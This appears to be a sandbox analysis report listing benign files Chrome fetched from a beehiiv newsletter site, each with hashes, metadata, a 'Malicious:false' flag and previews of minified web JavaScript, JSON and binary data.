                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (534)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):902
                                                                                                                                            Entropy (8bit):5.485611931534671
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuS30/wNwLvunX4vT/LZYn7pHy/AYD2qh625eeKA34y/x:UgqHHVvCaRuSRNEunX+187pHyIzq9Km7
                                                                                                                                            MD5:C7642FB9813B7D755EA0FF08DDC5307C
                                                                                                                                            SHA1:1EE96F2DFC60EF202D0DC13ABF78B3072817FE04
                                                                                                                                            SHA-256:4ACEF49D876CF633AAAC5D1A697D36CF3C91F25CE6F3050E231FF26E067187B1
                                                                                                                                            SHA-512:6C2BDBA8C826BE91D0C05C6902149072EEA8C7377EF7962D52DAE0DABE3E3144693C53C88383ED42850E7AEE0758F648DA442EFAF83479C68F42ED3516628617
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/ChevronDownIcon-CCywpT3m.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="50a94ada-3a0e-505f-b0d6-c38dd53d3543")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function t({title:r,titleId:a,...l},o){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:o,"aria-labelledby":a},l),r?e.createElement("title",{id:a},r):null,e.createElement("path",{fillRule:"evenodd",d:"M12.53 16.28a.75.75 0 0 1-1.06 0l-7.5-7.5a.75.75 0 0 1 1.06-1.06L12 14.69l6.97-6.97a.75.75 0 1 1 1.06 1.06l-7.5 7.5Z",clipRule:"evenodd"}))}const c=e.forwardRef(t);export{c as F};.//# sourceMappingURL=ChevronDownIcon-CCywpT3m.js.map..//# debugId=50a94ada-3a0e-505f-b0d6-c38dd53d3543.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1037)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1401
                                                                                                                                            Entropy (8bit):5.385236089561547
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSrIzNuUuV9DUF40bN5iycbkME3fwhqnnWFYSYcUlt45o43F4XnJsx:JWkEPIzNUV9DUF5/53foqnG0cUT4a43R
                                                                                                                                            MD5:510FDDB00701D6605C824F1EB0A7EA9A
                                                                                                                                            SHA1:488D6C2C27F496497F910D76F955199B5B9B3CE6
                                                                                                                                            SHA-256:645173E8089066C1AC711E5CD5BD00C6937DFD7FC93EA05989A657872DE24C7D
                                                                                                                                            SHA-512:C7A64511C9315D77CF51D8DF8A8714961278A5661FB30E88E6EB749516F6E094C09F9612EF28D8C9D5A96E7E30FF03C41543A7125882E6CB24A955C84364AF61
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/description-BklOXbF-.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="75c399d0-b648-50b8-b4cc-d715f4aee401")}catch(e){}}();.import{r as l,e as m}from"./index-D6da9p6-.js";import{U as d,I as f,y as g,l as h,C as x,o as E}from"./keyboard-CaEu2o0u.js";let u=l.createContext(null);function c(){let o=l.useContext(u);if(o===null){let t=new Error("You used a <Description /> component, but it is not inside a relevant parent.");throw Error.captureStackTrace&&Error.captureStackTrace(t,c),t}return o}function P(){let[o,t]=l.useState([]);return[o.length>0?o.join(" "):void 0,l.useMemo(()=>function(e){let n=E(r=>(t(i=>[...i,r]),()=>t(i=>{let s=i.slice(),p=s.indexOf(r);return p!==-1&&s.splice(p,1),s}))),a=l.useMemo(()=>({register:n,slot:e.slot,name:e.name,props:e.props}),[n,e.slot,e.name,e.props]);return m.createElement(u.Provider,{value:a},e.children)},[t])]}let v
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1072
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):501
                                                                                                                                            Entropy (8bit):7.533810358417031
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:XUlPgzpWVSbK9DKQ+qd6Lorm5ZzRxNqwWtMD:X+PgFWVSOtKQVdgorm9xNqa
                                                                                                                                            MD5:BA297DB577E890A1F50C7F314593760A
                                                                                                                                            SHA1:D93F9FF0EFB410F657410C1F4CFA55B7BC13ABD5
                                                                                                                                            SHA-256:2B4308FBE02E743CE59DFED30712AA354299BC9357C2B81084BC325613283CD6
                                                                                                                                            SHA-512:7364B143ADD330317974EE1A92AA5D238FCD2013E30DD2CC568EA50A7DF856A6392BDFD07B59C79C34220C660338D6D40B48379C23E9CFFCD16626AFDF022601
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:..........}S=o.0....?..\...".P-..5C..Vm..m$....;G...(4...{...t.|.i.....s.v.~.....q.vz.........p...8v......w....e....O.OO....VJ.}......s.......:..)..p.R":dO%D.....0x.*;....*-..San......'....7.UQ....;....O..u.....f.....=..(.3..J.nX.A.*..|B.%.6..."p.E8.Y.u.RJ.P..WM.dkA.W..*P.a..........w.u<.6...<....R.&2..B*..S.bnX..H0....}.B.n..b.8.=..Z.cq./..+...:Z..1a..R7,>.`..p.....J.c.=g..<..(..*K.C.k...^7...>Gp.#$..x....w]x....:Z......./R.6.U.N6.v.,...Q.Zz.....:.5..'.B?..xuW........._V..'0...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):673
                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1062
                                                                                                                                            Entropy (8bit):7.729232835183738
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:eFl474pMDr/2bS7amtjvOA9QFo/qRQENtFEWPAIsO4fsuK9:eFl474p0T22C/RQENtZHsO4fw
                                                                                                                                            MD5:725681B49F77650B9C9B970EB784476C
                                                                                                                                            SHA1:03B9DC915273407F5BF71B54E216D1148C63F33C
                                                                                                                                            SHA-256:2ED6A58366FE3399DFA3196550769FA9B26C21AF6819E44F40B0530F202BA619
                                                                                                                                            SHA-512:AEEE5DB9078AEE4D97B2591F2B974D0564D18A82F32FCD33154D29C21BC3AE188DC16726BFA76644D127059D051757ACB1E0FA2D92B4016003780965F4A9B4C9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.PNG........IHDR...0...0.....W.......pHYs...........~.....IDATh..Z-L$1..n......"..q........Kr$.. ....'AA......,.*.....+.C....Lw..%.t........v~....(.R#...... ....... .....[.!]...@W....N...U.Y.!...g..SpI...dV@)E...`./..N...Ap..p&..R4.......V5...f.J....H........PJ....:..A.T.2.G...'..K,b....L....SSS.yxxH,.<S.u...5...2ag].......C...<.e.G...d..U&.W.lBWWWx~~..d.3.QaG...x.....66....H~..7...!B.d..H...=..z.`\.j...%WI.Z.OOO.{.......!.....=",s{{..wvv....$...: ..s.........c188.....j..7..J\(....E..,.t..lL(..`...."................D..)....-3#4...8.Lf.8...].^2..'zzz0<<.%.P..5.....E.e...e........V+.[J....@\X...r+..lmm...Q.wwwcff&.|..,.y.FC.`......*.........1.........h...L,D....Ym......mFP..>o.....`..L.y.Q+.Y.7.&''.<...l..<.$..^@....<...,..)*......p..$.....;mF.c...U.R{.EI.S.E.....R..\|..7..r<RIB...4=.l...k].d..6::..lAh.F....v.c.&.f]..#i.z!.P(.........4-Gs.R....=...9.J| B....... .j..4.Bs.C.G...s.......R.*....a.......j..S$..k..4)t.<.....p:..w.xC..8.vK..NK....|WLx
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):446
                                                                                                                                            Entropy (8bit):5.548128582277272
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:W5V/pADGH4LvGaDzGvdAZE2MEuuo7wW6wewSYFb578uNNw1bv+godOdCWWCC6VK/:UgDGH4LOaOvCaBfuSLBNwz+Zd1WvVjhU
                                                                                                                                            MD5:431D51F526ED5C0B596A380370707958
                                                                                                                                            SHA1:7989BE9BB37FA40EB389B6022D953FC30DD54E51
                                                                                                                                            SHA-256:48F02BCD00E4D46A6CC9DD0FFDB224309977F2032A9BE31968BDA707D2506393
                                                                                                                                            SHA-512:08F4466149215601BA5BC17DCF0BD5D01E67AA22C7EBCF5E8922FFC283B1AD2245CD12C5B951E8CD6FC1A3DCDB9288CA44F29C333E8FCE5C7F7D84298C4D684C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/useTypedLoaderData-Bk1_tu68.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="73d08a9f-a008-5d16-8511-087e016ced4b")}catch(e){}}();.import{a}from"./components-Oj2xMfGE.js";const e=()=>a(),r=e;export{r as u};.//# sourceMappingURL=useTypedLoaderData-Bk1_tu68.js.map..//# debugId=73d08a9f-a008-5d16-8511-087e016ced4b.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (7140)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7502
                                                                                                                                            Entropy (8bit):5.4412144110616065
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:5zl50I3BZKkp/nRhblk7ljSmp5nzZVMWMOBI:5zl53RZKkp/Rhb+hjSmfzZiF+I
                                                                                                                                            MD5:CD14DDF127E2DD94222ECEE7ABE3B934
                                                                                                                                            SHA1:2D020DEBFF0433495966E6914CCF9FDC70EB0764
                                                                                                                                            SHA-256:6CDCC1F6C25CA1D266780C7B66B60C9B9EE84D131294F85D1A7C8881822B25B6
                                                                                                                                            SHA-512:2B25E4D866D2C86C041F0D59F9E071EDA49262997EDC95544A5F8E6038AACE27570819B2B1AC5B412856CBAEE8A5A2468D318944D74F9DA3FE3A38FB27C62B37
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="77599b8c-fb16-5d46-85f2-88519cabf801")}catch(e){}}();.import{c as R,g as K}from"./index-D6da9p6-.js";var N={exports:{}},E;function X(){return E||(E=1,function(V,et){(function(W,x){V.exports=x()})(R,function(){var W=1e3,x=6e4,U=36e5,A="millisecond",S="second",w="minute",O="hour",M="day",H="week",m="month",J="quarter",y="year",_="date",Z="Invalid Date",B=/^(\d{4})[-/]?(\d{1,2})?[-/]?(\d{0,2})[Tt\s]*(\d{1,2})?:?(\d{1,2})?:?(\d{1,2})?[.:]?(\d+)?$/,G=/\[([^\]]+)]|Y{1,4}|M{1,4}|D{1,2}|d{1,4}|H{1,2}|h{1,2}|a|A|m{1,2}|s{1,2}|Z{1,2}|SSS/g,P={name:"en",weekdays:"Sunday_Monday_Tuesday_Wednesday_Thursday_Friday_Saturday".split("_"),months:"January_February_March_April_May_June_July_August_September_October_November_December".split("_"),ordinal:function(s){var n=["th","st","nd","rd"],t=s%100;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):96
                                                                                                                                            Entropy (8bit):5.218997042938778
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                                                                                                            MD5:9872BE83FA60DA999B65A3BD481731D3
                                                                                                                                            SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                                                                                                            SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                                                                                                            SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                                                            Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (476)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):838
                                                                                                                                            Entropy (8bit):5.453038964859913
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSfN2f6nXkVn71oi7IyhntSt:JWkEzNAsXkVn71fnw
                                                                                                                                            MD5:06EAE6F4D5E43D35C7A844340CC52D0E
                                                                                                                                            SHA1:43850A9C0B6395FBA71F1EEB5085390332E17588
                                                                                                                                            SHA-256:75AE0911A6F12227F21F2A379E39B93541AD864A420BB7B44BB718056E626C79
                                                                                                                                            SHA-512:FD2E83224233162FC1DA133246EDF5844A11374314BE6A9B096116FFBFF2E18264F9B26A6498F59DD7FCF1C7030160037E1466DE549D6DBAA5C6C26E0EA6AE5C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/CheckIcon-681VH8qr.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aa7f8f9a-f7a3-512d-925f-8380c5df22e3")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function a({title:r,titleId:t,...o},n){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"m4.5 12.75 6 6 9-13.5"}))}const i=e.forwardRef(a);export{i as F};.//# sourceMappingURL=CheckIcon-681VH8qr.js.map..//# debugId=aa7f8f9a-f7a3-512d-925f-8380c5df22e3.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):72
                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (40452), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):40452
                                                                                                                                            Entropy (8bit):5.330891307568951
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:yrgIi8sdjoDZ2MoqHN3n2PZPuzHBVnY6wdjMT4bTQe7UA/X+U+iYoX4LFQnlzlGK:yrgIi8sdjoDZJoqHN3n2PZPuzHBVnY6o
                                                                                                                                            MD5:36028D980F179F0D7CD5BE7D6D3A8BCF
                                                                                                                                            SHA1:7802F522E387E83804FC4449E5C4277F827896DE
                                                                                                                                            SHA-256:C309D791BC16D3C39599A116ABE7BBBE7D164722B0EBC186A1AB29A687C82621
                                                                                                                                            SHA-512:F473124ACCF753D83B961EAF2051A07187853DF801CC19309F9C2368213CA046C27F7078F97DFC452777C1F3602EECC7734664A1324098C08B26652B5CB8BDB0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://lf16-tiktok-web.tiktokcdn-us.com/obj/tiktok-web-tx/tiktok/falcon/embed/embed_v1.0.12.js
                                                                                                                                            Preview:!function(){var t={723:function(t,n,r){"use strict";function e(t){!i.length&&o(),i[i.length]=t}t.exports=e;var o,i=[],u=0;function c(){for(;u<i.length;){var t=u;if(u+=1,i[t].call(),u>1024){for(var n=0,r=i.length-u;n<r;n++)i[n]=i[n+u];i.length-=u,u=0}}i.length=0,u=0}var a=void 0!==r.g?r.g:self,f=a.MutationObserver||a.WebKitMutationObserver;o="function"==typeof f?function(t){var n=1,r=new f(t),e=document.createTextNode("");return r.observe(e,{characterData:!0}),function(){n=-n,e.data=n}}(c):s(c),e.requestFlush=o;function s(t){return function(){var n=setTimeout(e,0),r=setInterval(e,50);function e(){clearTimeout(n),clearInterval(r),t()}}}e.makeRequestCallFromTimer=s},2691:function(t,n,r){r("9115"),r("774"),r("522"),r("8295"),r("7842"),r("110"),r("75"),r("4336"),r("9371"),r("8837"),r("6773"),r("5745"),r("3057"),r("3750"),r("3369"),r("9564"),r("2000"),r("8977"),r("2310"),r("4899"),r("1842"),r("6997"),t.exports=r("5645").Array},4963:function(t){t.exports=function(t){if("function"!=typeof t)th
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3232)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3599
                                                                                                                                            Entropy (8bit):5.478761913789035
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QI6rPxXkUJ9PpF3UZICMXLnFI6bJq1owE:jckUTPpWC20q1O
                                                                                                                                            MD5:2BD4E61C99666C3C86336852324D1413
                                                                                                                                            SHA1:D50EAB362A8B1DB71C324426AAFE5B8B7FB826EB
                                                                                                                                            SHA-256:5229B3040D227A4AF2B81FBC82F5BD1289301FF26A1F2BA13D010854AF372E2D
                                                                                                                                            SHA-512:1C1C96F63F5822CF4BB2A7658CDFF85F6017DCB852D1F3BF6FF7CB257422A7FFABD0EDB4D11B5DA7D38E394D3F6A91F95DDF3F5791778E48EF522FCD7FDE2DB6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5b24908e-af64-5771-8367-1c4890fd594e")}catch(e){}}();.import{e as h,u as b,b as x,l as F}from"./keyboard-CaEu2o0u.js";import{r as p}from"./index-D6da9p6-.js";function f(e){return h.isServer?null:e instanceof Node?e.ownerDocument:e!=null&&e.hasOwnProperty("current")&&e.current instanceof Node?e.current.ownerDocument:document}let d=["[contentEditable=true]","[tabindex]","a[href]","area[href]","button:not([disabled])","iframe","input:not([disabled])","select:not([disabled])","textarea:not([disabled])"].map(e=>`${e}:not([tabindex='-1'])`).join(",");var w=(e=>(e[e.First=1]="First",e[e.Previous=2]="Previous",e[e.Next=4]="Next",e[e.Last=8]="Last",e[e.WrapAround=16]="WrapAround",e[e.NoScroll=32]="NoScroll",e))(w||{}),y=(e=>(e[e.Error=0]="Error",e[e.Overflow=1]="Overflow",e[e.Success=2]="
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (789)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1147
                                                                                                                                            Entropy (8bit):5.445598437701319
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSbcLNCan0ZXa8Dq7SsveezXhS9OhGYGzAH3yBWuT:JWkEfiN1GXacXyXzXlQE4WuT
                                                                                                                                            MD5:BC1AC338B71953A031C84D1D1181E652
                                                                                                                                            SHA1:B67BAAF5BD53E6DDAC477CD2BD1B5960CDABBE58
                                                                                                                                            SHA-256:C752B9FB223A1DB46F685D50D276ADE13902F46F6EE998505EBDA0EBF87A2C46
                                                                                                                                            SHA-512:21A955CAF16D723F97432B4DE013BC553E2A320D33DD3A6B4D003C9DB88C0A798CE9BC5711B392FCD9AF45C0EF62AD1156A481E3F33F61088EDA388369D9C0A4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e4d6ec24-cba6-50d3-86bc-43cf8d83bb7f")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{e as a}from"./index-D6da9p6-.js";import{F as c}from"./ChevronRightIcon-Dsmk2epM.js";const l=({breadcrumbs:s,homePage:n})=>{const o=n?.general_section.theme.text_color||"";return e.jsx("ul",{className:"flex flex-wrap items-center gap-2 text-xs font-semibold",children:s.map((t,r)=>e.jsx(a.Fragment,{children:e.jsxs("li",{suppressHydrationWarning:!0,className:"flex items-center gap-2 text-wt-text-on-background",style:{color:o},children:[r===s.length-1?e.jsx("span",{className:"!opacity-100",children:t.text}):e.jsx(a.Fragment,{children:t.href?e.jsx("a",{href:t.href,className:"opacity-70",children:t.text}):e.jsx("span",{className:"opacity-70",children:t?.text})}),r!==s.length-1&&e.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):21786
                                                                                                                                            Entropy (8bit):4.484904166691514
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:nFapr713dQ1Z14EDZ2wj2opscJQQ9sY0a89sQaEWzkwB0:nU713ODZrj2opxd6sQdwu
                                                                                                                                            MD5:C5E53AE2E3FCA3A16D52D66B2E051135
                                                                                                                                            SHA1:898D9113ECE2A24E55E4EAA591B84E8787E896AC
                                                                                                                                            SHA-256:3F12C9FF7CD33F82332F4DFC4B3117CD49A45073AFAECF3C3F4687BA9BE68B0A
                                                                                                                                            SHA-512:F6609A35A0802DF4FF8F1F70333A772F16FE69D79395901CF424161FE940CB81037C7BFEA0854B8FB9864E8D905F9683819E1D954143C8541856AF1CD3DF8F95
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/locales/en/common.json
                                                                                                                                            Preview:{. "admin": {. "modal": {. "title": "You're logged in as an admin",. "description": "At this time, admin functions are limited to: Commenting on posts, Deleting comments on posts.". }. },. "comments": {. "header": "Join the conversation",. "upgrade": {. "title": "Upgrade to continue",. "description": "Please upgrade to premium to participate in this discussion!",. "cta": "Upgrade Now". },. "like": "Like",. "loading": {. "loading": "Loading",. "load_more": "Load more". },. "reporting": {. "report": "Report",. "reporting": "Reporting",. "reported": "Reported",. "report_action_placeholder": "Add a note for the moderator",. "file_report": "File a report",. "filing_report_for": "Filing a report for". },. "deleting": {. "delete": "Delete",. "deleting": "Deleting",. "deleted": "Deleted",. "deleting_comment": "Deleting comment",. "delete_comment": "Delete Comment",.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):621
                                                                                                                                            Entropy (8bit):7.673946009263606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (657)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1035
                                                                                                                                            Entropy (8bit):5.443865240069979
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSPrNyO/xRTsMs7BOXEMN4XyFPUXQPZLkrPeNrnVrp7VC7N:JWkETrNyO/DX7NBZZFrnVr3C7N
                                                                                                                                            MD5:3D515E496D75E42A655FB6CE3643F2E9
                                                                                                                                            SHA1:42C38593341E4E0C34791F7ED9A21375505F53B3
                                                                                                                                            SHA-256:62BB8BA3766CD1DDE008B6FCF60C87BD65B41104EB44817C20E37C130F9B534E
                                                                                                                                            SHA-512:903E0D23883D2B4684D2DD8377C12D0D784E1C8C9559617F669908E6CE09DB908CD3A586F26434874874625A47FEE58BD980430EA77BF19CAEC0F08DAD8DA9EB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
